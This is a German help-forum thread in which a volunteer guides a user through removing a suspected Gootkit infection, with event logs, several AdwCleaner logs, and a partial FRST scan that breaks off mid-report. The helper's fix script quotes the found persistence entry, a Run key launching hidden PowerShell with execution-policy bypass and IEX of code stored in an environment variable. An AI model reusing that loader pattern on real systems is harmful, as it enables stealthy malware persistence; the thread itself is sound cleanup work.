Description: Der Dienst "McAfee WebAdvisor" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/13/2021 10:43:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrvR" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/13/2021 10:43:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/13/2021 10:20:09 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "McAfee WebAdvisor" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/13/2021 10:18:08 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "InCD Helper" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
Unzulässige Funktion.

Error: (01/12/2021 03:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "InCDsrv" wurde mit dem folgenden dienstspezifischen Fehler beendet: 
Unzulässige Funktion.

Error: (01/12/2021 03:21:59 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{ADA518B9-B7A3-4C36-B4ED-49EB3FA189FC}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/12/2021 03:21:59 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{ADA518B9-B7A3-4C36-B4ED-49EB3FA189FC}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


Windows Defender:
===================================
Date: 2021-01-13 22:43:43.0080000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-13 22:43:43.0070000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiSpyware
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-13 22:43:43.0070000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-13 22:43:42.9980000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-13 22:43:42.9980000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiSpyware
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

CodeIntegrity:
===================================

Date: 2021-01-13 20:42:22.8280000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.8230000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7690000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3470000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3400000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3350000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // American Megatrends Inc. V4.6.5.3 R1.23.0 for D3162-A1x 12/01/2014
Hauptplatine: FUJITSU D3162-A1
Prozessor: Intel(R) Core(TM) i5-3570 CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 35%
Installierter physikalischer RAM: 8107.74 MB
Verfügbarer physikalischer RAM: 5264.23 MB
Summe virtueller Speicher: 12203.74 MB
Verfügbarer virtueller Speicher: 8413.7 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.12 GB) (Free:720.66 GB) NTFS
Drive f: (Daten) (Fixed) (Total:634.76 GB) (Free:269.72 GB) NTFS
Drive g: (Volume) (Fixed) (Total:296.75 GB) (Free:167.42 GB) NTFS
Drive h: () (Removable) (Total:58.85 GB) (Free:58.83 GB) exFAT

\\?\Volume{897fd41d-0000-0000-0000-100000000000}\ () (Fixed) (Total:0.49 GB) (Free:0.45 GB) NTFS
\\?\Volume{897fd41d-0000-0000-0000-d0a6e8000000}\ () (Fixed) (Total:0.91 GB) (Free:0.41 GB) NTFS

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 8D638B93)
Partition 1: (Not Active) - (Size=634.8 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=296.7 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 897FD41D)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=928 MB) - (Type=27)

==========================================================
Disk: 2 (Protective MBR) (Size: 58.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         
Die Symptome wurden bei vodafone seit 10.12.2020 registriert.
__________________

Alt 13.01.2021, 22:59   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



adwCleaner

Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei in CODE-Tags.

adwcleaner zwecks Kontrolle bitte wiederholen, falls es Funde gab.

Alt 14.01.2021, 00:13   #5
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Mehrere Runden gedreht, ein registry-Eintrag ist aber noch hartnäckig.
Hab nach Runde 2 noch eine AppliKation deinstalliert - Simplyclean - war mir eh suspekt das Ding.

AdwCleaner[C00].txt
Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build:    01-11-2021
# Database: 2021-01-11.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    01-13-2021
# Duration: 00:00:01
# OS:       Windows 10 Pro
# Cleaned:  16
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

Deleted       C:\Users\Public\Desktop\simpliclean.lnk

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKCU\SOFTWARE\acbdabdacadcfecb
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{0C5DC20B-9CA3-4A7C-AC9F-6056E23A9757}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{1DBD2E7A-D78B-4AC9-A081-F7C38FD80ABE}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{33BC60E0-F131-4EAF-847C-CB0EE0CF51E6}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{66B29A8C-1662-4154-A30B-FEC1CBCD797E}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7A080F98-A3E2-4F5A-B0CB-9CB65CD2C503}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{85CE0E62-F6F7-4BE1-89B8-D5AB0178F2D1}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{AE62C13B-87AE-4478-98E4-94E0B9B5DA6D}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{B5723925-285D-43DA-AB87-174217C0698C}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CDFC0017-575A-46DE-9133-409AFBD62C39}
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{FF2976C1-4A2F-4F5F-819D-51D8720A3178}
Deleted       HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|ApnUpdater
Deleted       HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0CFE535C35F99574E8340BFA75BF92C2
Deleted       HKLM\Software\Wow6432Node\\Classes\CLSID\{8BF0126F-A5B7-4720-ABB2-2414A0AF5474}
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|ApnUpdater

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3613 octets] - [13/01/2021 23:16:39]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
         
AdwCleaner[C01].txt
Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build:    01-11-2021
# Database: 2021-01-11.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    01-13-2021
# Duration: 00:00:00
# OS:       Windows 10 Pro
# Cleaned:  3
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{FCE8B9D0-8808-4B80-A225-CC32998339A3}C:\program files (x86)\simplitec\simplitec\simpliclean\serviceprovider.exe
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{116AA1E4-D0C4-45CC-99FF-60BCDE5B628F}C:\program files (x86)\simplitec\simplitec\simpliclean\serviceprovider.exe
Deleted       HKLM\Software\Wow6432Node\\Classes\CLSID\{8BF0126F-A5B7-4720-ABB2-2414A0AF5474}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3613 octets] - [13/01/2021 23:16:39]
AdwCleaner[C00].txt - [3511 octets] - [13/01/2021 23:19:01]
AdwCleaner[S01].txt - [2106 octets] - [13/01/2021 23:24:00]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
         
AdwCleaner[C02].txt

Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build:    01-11-2021
# Database: 2021-01-11.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    01-13-2021
# Duration: 00:00:00
# OS:       Windows 10 Pro
# Cleaned:  3
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{15B2C54C-31E2-442D-B0F9-9588500D7E53}C:\program files (x86)\simplitec\simplitec\simpliclean\serviceprovider.exe
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{B1D0E85D-F6BE-4E6B-8C35-75C9B66C7A8E}C:\program files (x86)\simplitec\simplitec\simpliclean\serviceprovider.exe
Deleted       HKLM\Software\Wow6432Node\\Classes\CLSID\{8BF0126F-A5B7-4720-ABB2-2414A0AF5474}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3613 octets] - [13/01/2021 23:16:39]
AdwCleaner[C00].txt - [3511 octets] - [13/01/2021 23:19:01]
AdwCleaner[S01].txt - [2106 octets] - [13/01/2021 23:24:00]
AdwCleaner[C01].txt - [2240 octets] - [13/01/2021 23:24:25]
AdwCleaner[S02].txt - [2228 octets] - [13/01/2021 23:26:05]
AdwCleaner[S03].txt - [2289 octets] - [13/01/2021 23:32:04]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C03].txt ##########
         
Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build:    01-11-2021
# Database: 2021-01-11.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    01-13-2021
# Duration: 00:00:00
# OS:       Windows 10 Pro
# Cleaned:  1
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKLM\Software\Wow6432Node\\Classes\CLSID\{8BF0126F-A5B7-4720-ABB2-2414A0AF5474}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3613 octets] - [13/01/2021 23:16:39]
AdwCleaner[C00].txt - [3511 octets] - [13/01/2021 23:19:01]
AdwCleaner[S01].txt - [2106 octets] - [13/01/2021 23:24:00]
AdwCleaner[C01].txt - [2240 octets] - [13/01/2021 23:24:25]
AdwCleaner[S02].txt - [2228 octets] - [13/01/2021 23:26:05]
AdwCleaner[S03].txt - [2289 octets] - [13/01/2021 23:32:04]
AdwCleaner[C03].txt - [2423 octets] - [13/01/2021 23:32:20]
AdwCleaner[S04].txt - [1907 octets] - [13/01/2021 23:35:38]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C04].txt ##########
         
Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build:    01-11-2021
# Database: 2021-01-11.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    01-13-2021
# Duration: 00:00:00
# OS:       Windows 10 Pro
# Cleaned:  1
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKLM\Software\Wow6432Node\\Classes\CLSID\{8BF0126F-A5B7-4720-ABB2-2414A0AF5474}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [3613 octets] - [13/01/2021 23:16:39]
AdwCleaner[C00].txt - [3511 octets] - [13/01/2021 23:19:01]
AdwCleaner[S01].txt - [2106 octets] - [13/01/2021 23:24:00]
AdwCleaner[C01].txt - [2240 octets] - [13/01/2021 23:24:25]
AdwCleaner[S02].txt - [2228 octets] - [13/01/2021 23:26:05]
AdwCleaner[S03].txt - [2289 octets] - [13/01/2021 23:32:04]
AdwCleaner[C03].txt - [2423 octets] - [13/01/2021 23:32:20]
AdwCleaner[S04].txt - [1907 octets] - [13/01/2021 23:35:38]
AdwCleaner[C04].txt - [2077 octets] - [13/01/2021 23:35:54]
AdwCleaner[S05].txt - [2029 octets] - [13/01/2021 23:37:40]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C05].txt ##########
         
Der Registry-Eintrag gehört wohl zu "2_MAGIX PC Check & Tuning 2019"
=> deinstalliert, neu gescannt, jetzt ist der auch Geschichte

Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build:    01-11-2021
# Database: 2021-01-11.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start:    01-14-2021
# Duration: 00:00:16
# OS:       Windows 10 Pro
# Scanned:  31956
# Detected: 0


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.


AdwCleaner[S00].txt - [3613 octets] - [13/01/2021 23:16:39]
AdwCleaner[C00].txt - [3511 octets] - [13/01/2021 23:19:01]
AdwCleaner[S01].txt - [2106 octets] - [13/01/2021 23:24:00]
AdwCleaner[C01].txt - [2240 octets] - [13/01/2021 23:24:25]
AdwCleaner[S02].txt - [2228 octets] - [13/01/2021 23:26:05]
AdwCleaner[S03].txt - [2289 octets] - [13/01/2021 23:32:04]
AdwCleaner[C03].txt - [2423 octets] - [13/01/2021 23:32:20]
AdwCleaner[S04].txt - [1907 octets] - [13/01/2021 23:35:38]
AdwCleaner[C04].txt - [2077 octets] - [13/01/2021 23:35:54]
AdwCleaner[S05].txt - [2029 octets] - [13/01/2021 23:37:40]
AdwCleaner[C05].txt - [2199 octets] - [13/01/2021 23:38:38]
AdwCleaner[S06].txt - [2151 octets] - [13/01/2021 23:44:17]
AdwCleaner[S07].txt - [2212 octets] - [14/01/2021 00:07:05]
AdwCleaner[C07].txt - [2382 octets] - [14/01/2021 00:07:15]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S08].txt ##########
         


Alt 14.01.2021, 00:22   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Scripting/Repair mit FRST64
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [acbdabdacadcfecb] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('acbdabdacadcfecb', 'User'))" <==== ACHTUNG
    Task: {719C960A-5108-4058-AF9F-1A0C8C497CCA} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG
    "C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" wurde entsperrt. <==== ACHTUNG
    Task: {F1F10BFF-3BC5-45A5-945E-7A0157B66721} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
    cmd: reg query "HKCU\Environment"
    cmd: reg query "HKCU\Software\%username%"
    cmd: reg query "HKCU\Software"
    cmd: netsh advfirewall reset
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.
__________________
--> vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet

Alt 14.01.2021, 00:34   #7
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



FRST.txt
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von Peter (Administrator) auf ESPRIMO (FUJITSU ESPRIMO P910) (14-01-2021 00:15:44)
Gestartet von C:\Users\Peter\Desktop
Geladene Profile: Peter
Platform: Windows 10 Pro Version 2004 19041.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(LogMeIn, Inc. -> LogMeIn, Inc.) C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe
(MAGIX AG) [Datei ist nicht signiert] C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(MAGIX Software GmbH -> MAGIX) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Peter\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Download Navigator\EPSDNMON.EXE
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIRGE.EXE

==================== Registry (Nicht auf der Ausnahmeliste) ===================

